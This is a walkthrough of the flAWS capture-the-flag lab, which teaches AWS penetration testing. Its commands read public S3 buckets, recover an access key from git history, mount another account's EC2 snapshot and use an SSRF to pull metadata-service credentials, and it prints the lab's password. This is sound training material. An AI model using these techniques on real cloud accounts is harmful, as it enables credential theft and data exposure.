
flAWS

flAWS is a CTF focused on teaching AWS (Amazon Web Services) pentesting. It introduces common security issues in AWS and how to exploit them. It's hosted on http://flaws.cloud/, so we don't need to set up anything in AWS ourselves

Level 1

This level is buckets of fun. See if you can find the first sub-domain

Using the URL given to us, we can check its response headers with curl
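
A minimal sketch of checking the headers (assuming a plain HEAD request is enough):

curl -I http://flaws.cloud/   # -I fetches only the response headers, including the Server header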

The response shows AmazonS3 in the Server header. Level 1 is about finding the sub-domain of the given domain from which we can access S3. S3 is Amazon's key-value object store, commonly used for storing files; these objects are stored in containers known as buckets

The URL of an S3 bucket comes in formats like http://&lt;bucket-name&gt;.s3.amazonaws.com/ or http://s3.amazonaws.com/&lt;bucket-name&gt;/

As seen from the Server header earlier, the site is hosted as an S3 bucket, so visiting http://flaws.cloud.s3.amazonaws.com/ will show us the bucket's contents. The reason it shows the contents is that the bucket allows unauthenticated (public) listing

This shows five html files

  • hint1.html
  • hint2.html
  • hint3.html
  • index.html
  • secret-dd02c7c.html

Having secret-dd02c7c.html, we don't really need to go through the hint files, as we have already found out about S3 and have the secret file

We can also access the bucket from the command line using aws-cli

If you encounter an error here from the AWS CLI, it can be resolved by installing urllib3 version 1.26.7
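
Assuming it is the common urllib3 version conflict, pinning the version is presumably enough:

pip install urllib3==1.26.7   # pin urllib3 to 1.26.7 (assumed package; the error itself is not shown here)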

To list the contents of an S3 bucket, the syntax is as follows. We use --no-sign-request because we don't want to authenticate, and --region specifies the region the bucket is hosted in

aws s3 ls s3://flaws.cloud/ --no-sign-request --region us-west-2 

We can download a single file like this (here hint1.html; the same command works for the secret file)

aws s3 cp s3://flaws.cloud/hint1.html --no-sign-request --region us-west-2 .

Or we can use cp with --recursive to download all the files from the bucket onto our local machine

aws s3 cp s3://flaws.cloud/ --no-sign-request --region us-west-2 . --recursive 

Level 2

Accessing a bucket with any valid AWS credential

Buckets can be misconfigured to allow anyone with any valid AWS credential to view them. If we try accessing this bucket http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud.s3.amazonaws.com/ without authenticating, it gives Access Denied

For this we now need to create an AWS free-tier account, which requires credit card information

After filling in the details, the account will be registered; log in as the root user

After logging in, we'll be brought to the AWS dashboard

Now we need to set up an AWS access key; to do that, go to Security Credentials

After closing this pop-up, the key becomes active

We can set the AWS key with aws configure
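
Running it prompts for the key details; a sketch, where the values are placeholders for the key we just created:

aws configure
# AWS Access Key ID [None]: AKIA...
# AWS Secret Access Key [None]: <secret key>
# Default region name [None]: us-west-2
# Default output format [None]: json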

These keys are saved in ~/.aws/credentials

And now we can access the level 2 bucket
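
With the default profile configured, listing should work along these lines (bucket name taken from the URL above):

aws s3 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/ --region us-west-2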

Download the secret html file

This will lead us to level 3

Level 3

Finding and accessing the bucket with an authorized AWS key

Let's access the bucket by going to this URL: http://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud.s3.amazonaws.com/

This bucket allows unauthenticated access and contains a git repository; we can download all of its files with --recursive

aws s3 cp s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ --region us-west-2 . --recursive
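
Once everything (including the `.git` directory) is downloaded, the history can be inspected as described next; a minimal sketch, where the commit hash is a placeholder taken from the git log output:

git log                  # list the commit history of the repository
git show <commit-hash>   # inspect the commit that removed the credentials; its diff reveals the AWS access key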

Using `git show` in the directory containing `.git`, we can see the deleted commit, which contains the AWS access key

With `aws s3 ls` we can list all the buckets, but they are not accessible with this key

Level 4

Accessing an EC2 instance

We are given a URL to a web site hosted on an EC2 instance: http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud

We can't access the bucket without an authorized AWS key

An EC2 instance is a virtual server on AWS; you can think of it as a Linux server hosted on and using AWS infrastructure

This level mentions that a backup (snapshot) of the EC2 instance was made

It'll be useful to know that a snapshot was made of that EC2 shortly after nginx was setup on it.

We can list the EC2 snapshots, but first we need the account ID (owner ID), which we can get with

aws sts get-caller-identity --output text

To list the ec2 snapshots

aws ec2 describe-snapshots --owner-id 975426262029 --output text --region us-west-2

But the text output is hard to read, so we can output it in JSON format instead
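
The same command with JSON output:

aws ec2 describe-snapshots --owner-id 975426262029 --output json --region us-west-2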

Note that we specify --owner-id because we only want the snapshots owned by this account; if we don't specify the ID, it will also list all the snapshots not owned by this user

To mount this snapshot, we need to create a volume from it in our own AWS account. To do that, we configure our own AWS key again, but this time give it a profile name so we can reference it
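
Configuring a named profile for our own account's key (arz is simply the profile name used in the commands below):

aws configure --profile arz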

aws ec2 create-volume --profile arz --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89

We can check whether the volume has been created and what its status is

aws ec2 describe-volumes --region us-west-2 --filters Name=volume-id,Values=vol-067022c1d15d83787 --profile arz 

Now, from the AWS dashboard, go to Services -> Compute -> EC2 -> Elastic Block Store (EBS) -> Volumes; there you'll see the volume created from the snapshot

Go to Instances and launch a new instance; make sure to edit the network settings so the instance is created in us-west-2a (the same availability zone as the volume)

Create a key pair

Then launch the instance

Clicking on the instance, we can find the public IP and DNS

Now simply log in with the private key (.pem) that was downloaded when creating the key pair, using the username ec2-user, which is the default user (you can change that if you want)
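
A sketch of the SSH login (the key file name and host are placeholders for the downloaded .pem and the instance's public DNS):

ssh -i <key-pair>.pem ec2-user@<instance-public-dns>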

Attach the volume to this instance
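
This can be done from the console or with the CLI; a sketch, where the instance ID and device name are placeholders:

aws ec2 attach-volume --volume-id vol-067022c1d15d83787 --instance-id <instance-id> --device /dev/sdf --region us-west-2 --profile arz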

Run blkid to see the device name and then mount it with mount
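
A sketch of the mount steps on the instance (the device and mount point names are assumptions; blkid shows the real ones):

sudo blkid                        # identify the attached volume's partition, e.g. /dev/xvdf1
sudo mkdir -p /mnt/flaws          # hypothetical mount point
sudo mount /dev/xvdf1 /mnt/flaws  # mount the snapshot's filesystem so we can browse it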

This reveals the username `flaws` with the password `nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M`; with these credentials we can log in to the nginx web page and find the link to the next level

Level 5

Accessing buckets through HTTP proxy

This EC2 instance is using nginx as a proxy

http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/

If we make a request to 127.0.0.1 through the proxy, we see the index page we got for completing level 4 (the level 5 page)

This means there's an SSRF vulnerability here, through which we can make a request to 169.254.169.254, a reserved IP for the EC2 metadata service, known as the magic IP

We want the latest metadata, from which we'll get the security credentials for the role named flaws, which contain an AWS access key
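
A sketch of pulling the credentials through the proxy (the exact metadata path is an assumption based on the standard IMDS layout):

curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws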

Having the access keys, we can configure them in the default profile

But we won't be able to view the user ID or the bucket, because these temporary credentials also need a session token; the error tells us the token is invalid

The token can be added in ~/.aws/credentials
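
A sketch of what ~/.aws/credentials looks like with the temporary credentials added (values are placeholders; the token goes under aws_session_token):

[default]
aws_access_key_id = <AccessKeyId from the metadata response>
aws_secret_access_key = <SecretAccessKey>
aws_session_token = <Token>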

And now we'll be able to use the AWS access key with the token added

In the bucket we see ddcc78ff/, so we'll just download the files recursively

Opening the index.html we'll get the page of the next challenge

Level 6

Enumerating AWS Policies

We are given an AWS access key; make sure to remove the previous session token

On checking the bucket, we'll get an Access Denied error

As the challenge is about policies, we can try playing with IAM, which is Identity and Access Management

aws iam list-roles
aws iam list-attached-user-policies --user-name level6


This user has the Security Audit and API Gateway policies attached. With the API Gateway policy we can see the function Level6 in Lambda. Lambda is AWS's service for running application code without managing servers; as seen here, the function's runtime is python2.7
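
The Lambda function and its runtime can presumably be listed with something like:

aws lambda list-functions --region us-west-2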

We need to get the API ID of the Level6 function

aws lambda get-policy --function-name Level6

With this ID we can list the stage name using get-stages

aws apigateway get-stages --rest-api-id s33ppypa75 

Putting these together gives us the URL of the API
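
The pieces fit the usual API Gateway URL format:

http://<rest-api-id>.execute-api.<region>.amazonaws.com/<stage-name>/<resource>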

http://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6

Visiting this link marks the finish of the flAWS challenge
